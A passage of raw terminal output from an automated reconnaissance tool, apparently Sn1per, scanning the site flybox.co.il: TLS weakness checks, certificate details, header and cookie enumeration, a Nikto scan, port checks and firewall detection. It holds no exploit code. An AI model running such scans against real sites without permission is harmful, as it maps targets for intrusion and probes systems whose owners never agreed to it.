[1m ROBOT                                     [m[1;32mServer does not support any cipher suites that use RSA key transport[m
[1m Secure Renegotiation [m(CVE-2009-3555)      [1;32mnot vulnerable (OK)[m
[1m Secure Client-Initiated Renegotiation     [m[0;32mnot vulnerable (OK)[m
[1m CRIME, TLS [m(CVE-2012-4929)                [0;32mnot vulnerable (OK)[m
[1m BREACH[m (CVE-2013-3587)                    [1;32mno HTTP compression (OK) [m - only supplied "/" tested
[1m POODLE, SSL[m (CVE-2014-3566)               [1;32mnot vulnerable (OK)[m
[1m TLS_FALLBACK_SCSV[m (RFC 7507)              [0;32mDowngrade attack prevention supported (OK)[m
[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329)    [1;32mnot vulnerable (OK)[m
[1m FREAK[m (CVE-2015-0204)                     [1;32mnot vulnerable (OK)[m
[1m DROWN[m (CVE-2016-0800, CVE-2016-0703)      [1;32mnot vulnerable on this host and port (OK)[m
                                           no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
[1m LOGJAM[m (CVE-2015-4000), experimental      [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
[1m BEAST[m (CVE-2011-3389)                     TLS1: [1;33mECDHE-ECDSA-AES128-SHA
                                                 ECDHE-ECDSA-AES256-SHA [m
                                           [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
[1m LUCKY13[m (CVE-2013-0169), experimental     potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
[1m RC4[m (CVE-2013-2566, CVE-2015-2808)        [0;32mno RC4 ciphers detected (OK)[m


[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m

Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
-----------------------------------------------------------------------------------------------------------------------------
 x1302   TLS13-AES-256-GCM-SHA384          ECDH[0;32m 253[m   AESGCM      256      TLS_AES_256_GCM_SHA384
 xcc14   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH[0;32m 256[m   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
 xc02c   ECDHE-ECDSA-AES256-GCM-SHA384     ECDH[0;32m 256[m   AESGCM      256      TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
 xc024   ECDHE-ECDSA-AES256-SHA384         ECDH[0;32m 256[m   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
 xc00a   ECDHE-ECDSA-AES256-SHA            ECDH[0;32m 256[m   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
 xcca9   ECDHE-ECDSA-CHACHA20-POLY1305     ECDH[0;32m 253[m   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
 x1301   TLS13-AES-128-GCM-SHA256          ECDH[0;32m 253[m   AESGCM      128      TLS_AES_128_GCM_SHA256
 xc02b   ECDHE-ECDSA-AES128-GCM-SHA256     ECDH[0;32m 256[m   AESGCM      128      TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
 xc023   ECDHE-ECDSA-AES128-SHA256         ECDH[0;32m 256[m   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
 xc009   ECDHE-ECDSA-AES128-SHA            ECDH[0;32m 256[m   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA


[1m[4m Running client simulations via sockets [m

 Android 2.3.7                No connection
 Android 4.1.1                TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Android 4.3                  TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Android 4.4.2                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Android 5.0.0                TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
 Android 6.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
 Android 7.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, [0;32m253 bit ECDH (X25519)[m
 Chrome 51 Win 7              TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
 Chrome 57 Win 7              TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
 Firefox 49 Win 7             TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Firefox 53 Win 7             TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
 IE 6 XP                      No connection
 IE 7 Vista                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 IE 8 XP                      No connection
 IE 8 Win 7                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win 7                  TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win 8.1                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win Phone 8.1 Update   TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win 10                 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Edge 13 Win 10               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Edge 13 Win Phone 10         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Opera 17 Win 7               TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Safari 5.1.9 OS X 10.6.8     TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Safari 7 iOS 7.1             TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Safari 9 OS X 10.11          TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Safari 10 OS X 10.12         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Apple ATS 9 iOS 9            TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Tor 17.0.9 Win 7             TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Java 6u45                    No connection
 Java 7u25                    TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Java 8u31                    TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 OpenSSL 1.0.1l               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 OpenSSL 1.0.2e               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m

[7m Done 2017-12-31 05:24:09 [ 247s] -->> 104.31.75.239:443 (flybox.co.il) <<--[m

-----------------------------------------------------
[7m Start 2017-12-31 05:24:09        -->> 104.31.74.239:443 (flybox.co.il) <<--[m

 further IP addresses:   104.31.75.239 2400:cb00:2048:1::681f:4bef
                         2400:cb00:2048:1::681f:4aef
 rDNS (104.31.74.239):   --
 Service detected:       HTTP


[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m

[1m SSLv2      [m[1;32mnot offered (OK)[m
[1m SSLv3      [m[1;32mnot offered (OK)[m
[1m TLS 1      [moffered
[1m TLS 1.1    [moffered
[1m TLS 1.2    [m[1;32moffered (OK)[m
[1m TLS 1.3    [m[1;32moffered (OK)[m: draft 18
[1m SPDY/NPN   [mh2, spdy/3.1, http/1.1 (advertised)
[1m HTTP2/ALPN [mh2, spdy/3.1, http/1.1 (offered)

[1m[4m Testing ~standard cipher categories [m

[1m NULL ciphers (no encryption)                  [m[1;32mnot offered (OK)[m
[1m Anonymous NULL Ciphers (no authentication)    [m[1;32mnot offered (OK)[m
[1m Export ciphers (w/o ADH+NULL)                 [m[1;32mnot offered (OK)[m
[1m LOW: 64 Bit + DES encryption (w/o export)     [m[1;32mnot offered (OK)[m
[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    [m[0;32mnot offered (OK)[m
[1m Triple DES Ciphers (Medium)                   [mnot offered (OK)
[1m High encryption (AES+Camellia, no AEAD)       [m[0;32moffered (OK)[m
[1m Strong encryption (AEAD ciphers)              [m[1;32moffered (OK)[m


[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m

[0;32m PFS is offered (OK)[m          TLS13-AES-256-GCM-SHA384
                              TLS13-CHACHA20-POLY1305-SHA256
                              ECDHE-ECDSA-CHACHA20-POLY1305-OLD
                              ECDHE-ECDSA-AES256-GCM-SHA384
                              ECDHE-ECDSA-AES256-SHA384 ECDHE-ECDSA-AES256-SHA
                              ECDHE-ECDSA-CHACHA20-POLY1305
                              TLS13-AES-128-GCM-SHA256
                              ECDHE-ECDSA-AES128-GCM-SHA256
                              ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA
[1m Elliptic curves offered:     [msecp224r1 [0;32mprime256v1[m [0;32msecp384r1[m [0;32msecp521r1[m [0;32mX25519[m


[1m[4m Testing server preferences [m

[1m Has server cipher order?     [m[1;32myes (OK)[m
[1m Negotiated protocol          [m[1;32mTLSv1.3[m
[1m Negotiated cipher            [m[1;32mTLS13-AES-256-GCM-SHA384[m, [0;32m253 bit ECDH (X25519)[m
[1m Cipher order[m
    TLSv1:     ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
    TLSv1.1:   ECDHE-ECDSA-AES128-SHA ECDHE-ECDSA-AES256-SHA
    TLSv1.2:   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDHE-ECDSA-CHACHA20-POLY1305
               ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-SHA
               ECDHE-ECDSA-AES128-SHA256 ECDHE-ECDSA-AES256-GCM-SHA384
               ECDHE-ECDSA-AES256-SHA ECDHE-ECDSA-AES256-SHA384
    TLSv1.3:   TLS13-AES-256-GCM-SHA384 TLS13-CHACHA20-POLY1305-SHA256
               TLS13-AES-128-GCM-SHA256


[1m[4m Testing server defaults (Server Hello) [m

[1m TLS extensions (standard)    [m"renegotiation info/#65281" "server name/#0"
                              "session ticket/#35" "status request/#5"
                              "next protocol/#13172" "EC point formats/#11"
                              "extended master secret/#23"
                              "signed certificate timestamps/#18"
                              "application layer protocol negotiation/#16"
[1m Session Ticket RFC 5077 hint [m64800 seconds, session tickets keys seems to be rotated < daily
[1m SSL Session ID support       [myes
[1m Session Resumption           [mTickets: yes, ID: yes
[1m TLS clock skew[m               -1 sec from localtime
[1m Signature Algorithm          [m[0;32mECDSA with SHA256[m
[1m Server key size              [mECDSA [0;32m256[m bits
[1m Fingerprint / Serial         [mSHA1 241F2CD8DFACDEAEB1AEB7104A94653708701987 / 4B78D31156C5EC99DAF67C53B1FDAC49
                              SHA256 39F0EFA4589C2C3EE02214DE224E9EF7BAED9F31A533D05A131ED458E82F53EE
[1m Common Name (CN)             [m[3msni165065.cloudflaressl.com[m (request w/o SNI didn't succeed, usual for EC certificates)
[1m subjectAltName (SAN)         [m[3msni165065.cloudflaressl.com *.aonlineorder.tk
                              *.bestproductthisyear.tk *.bigsale135store.tk
                              *.bigsale171store.tk *.bigsale215store.tk
                              *.bigsale248store.tk *.bigsale281store.tk
                              *.bjfhiu.tk *.bsmartbuyer.tk
                              *.bsmartonlineshop.tk *.btokoonlinemurah.tk
                              *.budgettrouwfilm.nl *.dbranded.tk
                              *.eawesomemarket.tk *.emmom.tk *.flybox.co.il
                              *.fmarketplus.tk *.ftopbuy.tk *.h1xv9oacp.ga
                              *.ialliexpress.tk *.iowist.com *.ipaytoko.tk
                              *.iperfectmarket.tk *.ismartxpress.tk
                              *.jsmartonlineshop.tk *.jtopcharts.tk
                              *.lalliexpress.tk *.lpayperclick.tk
                              *.lpremiumonlineshop.tk *.onlinekanyakumari.com
                              *.osmartbuyer.tk *.pawesomemarket.tk
                              *.pbelimudah.tk *.rlinkaliexpress.tk
                              *.rnesaliexpress.tk *.samriddle.website
                              *.snapcracka.us *.stokoonlinemurah.tk *.taeaj.tk
                              *.techxpertsllc.com *.vbrs.co.uk
                              *.wholesaleonline114.tk *.wholesaleonline4.tk
                              *.wholesaleonline55.tk *.wittcatt.stream
                              aonlineorder.tk bestproductthisyear.tk
                              bigsale135store.tk bigsale171store.tk
                              bigsale215store.tk bigsale248store.tk
                              bigsale281store.tk bjfhiu.tk bsmartbuyer.tk
                              bsmartonlineshop.tk btokoonlinemurah.tk
                              budgettrouwfilm.nl dbranded.tk eawesomemarket.tk
                              emmom.tk flybox.co.il fmarketplus.tk ftopbuy.tk
                              h1xv9oacp.ga ialliexpress.tk iowist.com
                              ipaytoko.tk iperfectmarket.tk ismartxpress.tk
                              jsmartonlineshop.tk jtopcharts.tk lalliexpress.tk
                              lpayperclick.tk lpremiumonlineshop.tk
                              onlinekanyakumari.com osmartbuyer.tk
                              pawesomemarket.tk pbelimudah.tk
                              rlinkaliexpress.tk rnesaliexpress.tk
                              samriddle.website snapcracka.us
                              stokoonlinemurah.tk taeaj.tk techxpertsllc.com
                              vbrs.co.uk wholesaleonline114.tk
                              wholesaleonline4.tk wholesaleonline55.tk
                              wittcatt.stream [m
[1m Issuer                       [m[3mCOMODO ECC Domain Validation Secure Server CA 2[m ([3mCOMODO CA Limited[m from [3mGB[m)
[1m Trust (hostname)             [m[0;32mOk via SAN[m (SNI mandatory)
[1m Chain of trust[m               [0;32mOk   [m[0;35m[m
[1m EV cert[m (experimental)       no
[1m Certificate Expiration       [m[0;32m176 >= 60 days[m (2017-12-16 19:00 --> 2018-06-25 19:59 -0400)
[1m # of certificates provided[m   3
[1m Certificate Revocation List  [mhttp://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl
[1m OCSP URI                     [mhttp://ocsp.comodoca4.com
[1m OCSP stapling                [m[0;32moffered[m
[1m OCSP must staple             [mno
[1m DNS CAA RR[m (experimental)    [1;33mnot offered[m
[1m Certificate Transparency     [m[0;32myes[m (TLS extension)


[1m[4m Testing HTTP header response @ "/" [m

[1m HTTP Status Code           [m  301 Moved Permanently, redirecting to "https://www.flybox.co.il/"
[1m HTTP clock skew              [m0 sec from localtime
[1m Strict Transport Security    [m--
[1m Public Key Pinning           [m--
[1m Server banner                [mcloudflare
[1m Application banner           [m[33m[1mX-Powered-By(B[m: PHP/[33m7(B[m.[33m0(B[m.[33m1(B[m[33m3(B[m
[1m Cookie(s)                    [m3 issued: [0;33mNONE[m secure, [0;32m1/3[m HttpOnly -- maybe better try target URL of 30x
[1m Security headers             [m[0;33m--[m
[1m Reverse Proxy banner         [m--


[1m[4m Testing vulnerabilities [m

[1m Heartbleed[m (CVE-2014-0160)                [1;32mnot vulnerable (OK)[m, no heartbeat extension
[1m CCS[m (CVE-2014-0224)                       [1;32mnot vulnerable (OK)[m
[1m Ticketbleed[m (CVE-2016-9244), experiment.  [1;32mnot vulnerable (OK)[m, no session tickets
[1m ROBOT                                     [m[1;32mServer does not support any cipher suites that use RSA key transport[m
[1m Secure Renegotiation [m(CVE-2009-3555)      [1;32mnot vulnerable (OK)[m
[1m Secure Client-Initiated Renegotiation     [m[0;32mnot vulnerable (OK)[m
[1m CRIME, TLS [m(CVE-2012-4929)                [0;32mnot vulnerable (OK)[m
[1m BREACH[m (CVE-2013-3587)                    [1;32mno HTTP compression (OK) [m - only supplied "/" tested
[1m POODLE, SSL[m (CVE-2014-3566)               [1;32mnot vulnerable (OK)[m
[1m TLS_FALLBACK_SCSV[m (RFC 7507)              [0;32mDowngrade attack prevention supported (OK)[m
[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329)    [1;32mnot vulnerable (OK)[m
[1m FREAK[m (CVE-2015-0204)                     [1;32mnot vulnerable (OK)[m
[1m DROWN[m (CVE-2016-0800, CVE-2016-0703)      [1;32mnot vulnerable on this host and port (OK)[m
                                           no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
[1m LOGJAM[m (CVE-2015-4000), experimental      [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
[1m BEAST[m (CVE-2011-3389)                     TLS1: [1;33mECDHE-ECDSA-AES128-SHA
                                                 ECDHE-ECDSA-AES256-SHA [m
                                           [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
[1m LUCKY13[m (CVE-2013-0169), experimental     potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
[1m RC4[m (CVE-2013-2566, CVE-2015-2808)        [0;32mno RC4 ciphers detected (OK)[m


[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m

Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
-----------------------------------------------------------------------------------------------------------------------------
 x1302   TLS13-AES-256-GCM-SHA384          ECDH[0;32m 253[m   AESGCM      256      TLS_AES_256_GCM_SHA384
 xcc14   ECDHE-ECDSA-CHACHA20-POLY1305-OLD ECDH[0;32m 256[m   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256_OLD
 xc02c   ECDHE-ECDSA-AES256-GCM-SHA384     ECDH[0;32m 256[m   AESGCM      256      TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
 xc024   ECDHE-ECDSA-AES256-SHA384         ECDH[0;32m 256[m   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
 xc00a   ECDHE-ECDSA-AES256-SHA            ECDH[0;32m 256[m   AES         256      TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
 xcca9   ECDHE-ECDSA-CHACHA20-POLY1305     ECDH[0;32m 253[m   ChaCha20    256      TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
 x1301   TLS13-AES-128-GCM-SHA256          ECDH[0;32m 253[m   AESGCM      128      TLS_AES_128_GCM_SHA256
 xc02b   ECDHE-ECDSA-AES128-GCM-SHA256     ECDH[0;32m 256[m   AESGCM      128      TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
 xc023   ECDHE-ECDSA-AES128-SHA256         ECDH[0;32m 256[m   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
 xc009   ECDHE-ECDSA-AES128-SHA            ECDH[0;32m 256[m   AES         128      TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA


[1m[4m Running client simulations via sockets [m

 Android 2.3.7                No connection
 Android 4.1.1                TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Android 4.3                  TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Android 4.4.2                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Android 5.0.0                TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
 Android 6.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305-OLD, [0;32m256 bit ECDH (P-256)[m
 Android 7.0                  TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305, [0;32m253 bit ECDH (X25519)[m
 Chrome 51 Win 7              TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
 Chrome 57 Win 7              TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
 Firefox 49 Win 7             TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Firefox 53 Win 7             TLSv1.3 TLS13-AES-128-GCM-SHA256, [0;32m253 bit ECDH (X25519)[m
 IE 6 XP                      No connection
 IE 7 Vista                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 IE 8 XP                      No connection
 IE 8 Win 7                   TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win 7                  TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win 8.1                TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win Phone 8.1 Update   TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 IE 11 Win 10                 TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Edge 13 Win 10               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Edge 13 Win Phone 10         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Opera 17 Win 7               TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Safari 5.1.9 OS X 10.6.8     TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Safari 7 iOS 7.1             TLSv1.2 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Safari 9 OS X 10.11          TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Safari 10 OS X 10.12         TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Apple ATS 9 iOS 9            TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 Tor 17.0.9 Win 7             TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Java 6u45                    No connection
 Java 7u25                    TLSv1.0 ECDHE-ECDSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
 Java 8u31                    TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 OpenSSL 1.0.1l               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
 OpenSSL 1.0.2e               TLSv1.2 ECDHE-ECDSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m

[7m Done 2017-12-31 05:28:17 [ 495s] -->> 104.31.74.239:443 (flybox.co.il) <<--[m

-----------------------------------------------------
[1mDone testing now all IP addresses (on port 443): [m104.31.75.239 104.31.74.239


 ââââ âââââ âââ        ââââââ   ââââââ  ââââ    âââ    ââââââ ââââââ âââââââ [0m
âââââââ âââââââââ    âââ    â âââ    â âââââââ ââââ    ââ   â ââ   â ââââ âââ[0m
âââ    âââââââ  âââ  â ââââ   â ââââ   ââââ âââââââ    ââââ   ââââ   âââ   ââ[0m
âââ    âââ âââââââââ   â   âââ  â   âââââââââ  ââââ    âââ  â âââ  â ââââ   â[0m
ââââ   ââââ ââ   âââââââââââââââââââââââââ  ââââââââââââââââââââââââââââââââ [0m
â ââ   â  â ââ   âââââ âââ â ââ âââ â ââââââââââ âââ  âââ ââ âââ ââ â âââ  â [0m
â  â      â  â   ââ ââ ââ  â ââ ââ  â ââââ   â â â â  â â â  â â â  â â â  â [0m
â      â     â   â   â  â  â  â  â  â   â    â   â â      â      â    â â  â [0m
       â         â  â      â        â   â          â  â   â  â   â  â   â    [0m
                                             â                        â      [0m
[91m+ -- --=[MÃÅÅBÄ»ÃÃÄ V20160303 BÅž 1Å3 @ ÄÅÃÅŽÄÅÈÃÃÄ»Ä - https://crowdshield.com[0m
[91m+ -- --=[Scan Complete![0m
[92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
[94m+ -- --=[Checking if X-Content options are enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking if X-Frame options are enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking if X-XSS-Protection header is enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking HTTP methods on flybox.co.il...[0m [93m

[94m+ -- --=[Checking if TRACE method is enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for META tags on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for open proxy on flybox.co.il...[0m [93m

[94m+ -- --=[Enumerating software on flybox.co.il...[0m [93m
x-powered-by: PHP/7.0.13
set-cookie: PHPSESSID=g357t8tsdioj6o4cv8kvsij2f4; expires=Thu, 14-Sep-2023 18:24:10 GMT; Max-Age=180000000; path=/
server: cloudflare

[94m+ -- --=[Checking if Strict-Transport-Security is enabled on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for Flash cross-domain policy on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for Silverlight cross-domain policy on flybox.co.il...[0m [93m

[94m+ -- --=[Checking for HTML5 cross-origin resource sharing on flybox.co.il...[0m [93m

[94m+ -- --=[Retrieving robots.txt on flybox.co.il...[0m [93m
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

[94m+ -- --=[Retrieving sitemap.xml on flybox.co.il...[0m [93m

[94m+ -- --=[Checking cookie attributes on flybox.co.il...[0m [93m
set-cookie: __cfduid=d3aaf1e2b31c05c61168ba247f638c7a61514716107; expires=Mon, 31-Dec-18 10:28:27 GMT; path=/; domain=.flybox.co.il; HttpOnly
set-cookie: PHPSESSID=sbq77vcrt38t8vklj1ld90liu3; expires=Thu, 14-Sep-2023 18:24:15 GMT; Max-Age=180000000; path=/
set-cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 10:24:15 GMT; Max-Age=31536000; path=/

[94m+ -- --=[Checking for ASP.NET Detailed Errors on flybox.co.il...[0m [93m
          jQuery("input#footernewsletter").removeClass("error")
    jQuery("input#footernewsletter").addClass("error")
            if( returned_data.result == 'error' ) {
<body class="rtl error404">

[0m
[92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          104.31.75.239
+ Target Hostname:    flybox.co.il
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni165065.cloudflaressl.com
                   Ciphers:  ECDHE-ECDSA-CHACHA20-POLY1305
                   Issuer:   /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
+ Start Time:         2017-12-31 05:28:31 (GMT-5)
---------------------------------------------------------------------------
+ Server: cloudflare
+ Cookie __cfduid created without the secure flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'cf-ray' found, with contents: 3d5c8d721bb70eeb-EWR
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Hostname 'flybox.co.il' does not match certificate's names: sni165065.cloudflaressl.com
+ Scan terminated:  20 error(s) and 6 item(s) reported on remote host
+ End Time:           2017-12-31 05:29:19 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
[91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/flybox.co.il-port443.jpg
[91m + -- --=[Port 445 closed... skipping.[0m
[91m + -- --=[Port 512 closed... skipping.[0m
[91m + -- --=[Port 513 closed... skipping.[0m
[91m + -- --=[Port 514 closed... skipping.[0m
[91m + -- --=[Port 623 closed... skipping.[0m
[91m + -- --=[Port 624 closed... skipping.[0m
[91m + -- --=[Port 1099 closed... skipping.[0m
[91m + -- --=[Port 1433 closed... skipping.[0m
[91m + -- --=[Port 2049 closed... skipping.[0m
[91m + -- --=[Port 2121 closed... skipping.[0m
[91m + -- --=[Port 3306 closed... skipping.[0m
[91m + -- --=[Port 3310 closed... skipping.[0m
[91m + -- --=[Port 3128 closed... skipping.[0m
[91m + -- --=[Port 3389 closed... skipping.[0m
[91m + -- --=[Port 3632 closed... skipping.[0m
[91m + -- --=[Port 4443 closed... skipping.[0m
[91m + -- --=[Port 5432 closed... skipping.[0m
[91m + -- --=[Port 5800 closed... skipping.[0m
[91m + -- --=[Port 5900 closed... skipping.[0m
[91m + -- --=[Port 5984 closed... skipping.[0m
[91m + -- --=[Port 6000 closed... skipping.[0m
[91m + -- --=[Port 6667 closed... skipping.[0m
[91m + -- --=[Port 8000 closed... skipping.[0m
[91m + -- --=[Port 8100 closed... skipping.[0m
[93m + -- --=[Port 8080 opened... running tests...[0m

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://flybox.co.il:8080
The site http://flybox.co.il:8080 is behind a CloudFlare
